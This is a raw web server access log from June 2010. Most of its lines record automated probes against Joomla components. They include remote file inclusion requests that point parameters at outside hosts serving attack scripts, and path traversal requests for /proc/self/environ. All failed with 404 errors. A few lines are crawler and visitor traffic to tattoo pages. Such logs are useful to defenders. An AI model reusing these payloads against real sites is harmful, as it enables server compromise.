74.63.197.215 - - [21/Jun/2010:08:16:18 -0500] "GET /logs/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:16:18 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:16:19 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
202.142.222.235 - - [21/Jun/2010:08:16:19 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.142.222.235 - - [21/Jun/2010:08:16:19 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.142.222.235 - - [21/Jun/2010:08:16:19 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:16:20 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:16:20 -0500] "GET /logs/access_log.1274832000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:16:21 -0500] "GET /index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:16:21 -0500] "GET /logs/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:16:21 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:16:44 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:16:44 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:16:44 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:16:48 -0500] "GET /logs/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:16:48 -0500] "GET /index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:16:48 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:16:54 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:16:54 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:16:54 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:17:24 -0500] "GET /index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:17:26 -0500] "GET /logs/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:17:26 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:17:29 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:17:35 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:17:35 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:17:35 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:17:42 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:17:42 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:17:42 -0500] "GET /index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:17:43 -0500] "GET /logs/access_log.1274572800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:17:47 -0500] "GET /logs/access_log.1274572800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:18:43 -0500] "GET /logs/access_log.1274832000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:18:43 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:18:43 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
202.142.222.235 - - [21/Jun/2010:08:18:51 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_wisroyq&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:18:55 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:19:27 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:19:45 -0500] "GET /index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:19:45 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:19:45 -0500] "GET /logs/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:20:06 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:20:06 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:20:06 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.199.198 - - [21/Jun/2010:08:20:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.251.80.230 - - [21/Jun/2010:08:20:55 -0500] "GET /index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:21:02 -0500] "GET /logs/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:21:02 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:21:02 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:21:29 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.49.102 - - [21/Jun/2010:08:21:40 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:21:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:22:16 -0500] "GET /logs/access_log.1274572800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
203.251.80.230 - - [21/Jun/2010:08:22:55 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:23:04 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:23:05 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:23:11 -0500] "GET /logs/access_log.1274832000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:23:11 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
91.121.208.42 - - [21/Jun/2010:08:23:36 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:08:23:36 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:08:23:36 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
203.251.80.230 - - [21/Jun/2010:08:24:48 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:25:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.24.223 - - [21/Jun/2010:08:25:52 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:26:14 -0500] "GET /logs/access_log.1274832000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:08:26:30 -0500] "GET /logs/access_log.1274572800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:27:19 -0500] "GET /logs/index.php?option=com_rokdownloads&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:27:19 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rokdownloads&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:27:19 -0500] "GET /index.php?option=com_rokdownloads&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET /logs//index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET /logs//index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET /logs//index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET /logs//index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET /logs//index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET //index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET //index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET //index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET //index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:19 -0500] "GET //index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:20 -0500] "GET /logs//index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:20 -0500] "GET //index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:20 -0500] "GET /logs//index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [21/Jun/2010:08:27:20 -0500] "GET //index.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
81.21.192.225 - - [21/Jun/2010:08:27:30 -0500] "GET /logs/access_log.1274832000%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:27:30 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:27:30 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:28:35 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:29:12 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:29:56 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:08:30:11 -0500] "GET /logs/access_log.1274832000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:30:41 -0500] "GET /logs/access_log.1274572800%20%20/index.php?option=com_rokdownloads&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
70.106.163.207 - - [21/Jun/2010:08:31:37 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/url?sa=t&source=web&cd=9&ved=0CDUQFjAI&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+tattoo+flash&ei=q2kfTO_YNcT6lwek6qGwDg&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; GTB6.5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.6)"
70.106.163.207 - - [21/Jun/2010:08:31:37 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; GTB6.5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.6)"
70.106.163.207 - - [21/Jun/2010:08:31:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; FunWebProducts; GTB6.5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.30729; .NET CLR 3.0.30729; AskTB5.6)"
83.103.72.131 - - [21/Jun/2010:08:32:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:35:17 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.103.72.131 - - [21/Jun/2010:08:36:44 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.21.192.225 - - [21/Jun/2010:08:37:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.195.112.180 - - [21/Jun/2010:08:37:44 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [21/Jun/2010:08:37:44 -0500] "GET /logs/access_log.1170288000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.21.192.225 - - [21/Jun/2010:08:38:30 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rwcards&view=rwcards&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.121.208.42 - - [21/Jun/2010:08:40:19 -0500] "GET /logs/access_log.1274572800//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:08:40:19 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.208.42 - - [21/Jun/2010:08:40:20 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
74.63.197.215 - - [21/Jun/2010:08:42:06 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rokdownloads&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.68.88 - - [21/Jun/2010:08:43:06 -0500] "GET /logs//index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
79.174.68.88 - - [21/Jun/2010:08:43:06 -0500] "GET //index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
79.174.68.88 - - [21/Jun/2010:08:43:06 -0500] "GET /logs/access_log.1274832000//index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.63.197.215 - - [21/Jun/2010:08:43:38 -0500] "GET /logs/access_log.1274572800/index.php?option=com_rokdownloads&controller=http://ulala2.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
220.181.7.17 - - [21/Jun/2010:08:47:51 -0500] "GET /logs/access_log.1270771200 HTTP/1.1" 304 - "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.73.139.201 - - [21/Jun/2010:08:50:36 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
95.50.85.99 - - [21/Jun/2010:08:51:16 -0500] "GET //index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
95.50.85.99 - - [21/Jun/2010:08:51:16 -0500] "GET /logs//index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
95.50.85.99 - - [21/Jun/2010:08:51:16 -0500] "GET /logs/access_log.1274832000//index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.125.16.66 - - [21/Jun/2010:08:51:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
74.125.16.66 - - [21/Jun/2010:08:51:54 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13,Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
74.125.16.66 - - [21/Jun/2010:08:52:15 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Wireless Transcoder) Version/3.1 Safari/525.13"
207.46.13.92 - - [21/Jun/2010:08:52:41 -0500] "GET /logs/access_log.1184889600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [21/Jun/2010:08:55:05 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.175.239.226 - - [21/Jun/2010:08:56:25 -0500] "GET //index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.175.239.226 - - [21/Jun/2010:08:56:25 -0500] "GET /logs//index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.175.239.226 - - [21/Jun/2010:08:56:25 -0500] "GET /logs/access_log.1274832000//index.php?option=com_peoplebook&mosConfig.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.73.139.201 - - [21/Jun/2010:08:56:36 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.139.201 - - [21/Jun/2010:08:56:36 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.195.112.180 - - [21/Jun/2010:09:01:42 -0500] "GET /logs/access_log.1223251200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
